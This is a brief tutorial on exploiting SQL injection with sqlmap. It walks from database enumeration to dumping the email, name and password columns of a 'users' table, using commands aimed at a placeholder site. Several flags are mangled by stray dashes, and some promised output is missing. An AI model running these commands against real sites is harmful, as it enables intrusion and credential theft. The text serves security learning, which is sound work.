Exploit SQL Injection Using Sqlmap

SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.

Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

The following tutorial was made with a  linux system ( kali linux ).

First we need a target to do this ,

go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.

open your terminal and type this :

sqlmap –u www.site.com/product.php?catid=5  – -dbs

when sqlmap is done, it will tell you the Mysql version and some other information about the database.

At the end of the process , it will show you databases that it has found.

to see tables that are located at the database we gonna type :

sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables 

The result should be something like this :
Database: acuart

[8 tables]
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |

Now we have a list of tables , we need to get columns so we gonna type :

sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns


The result should be like this :
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
 and here’s the final result : we have got the name, mail and password: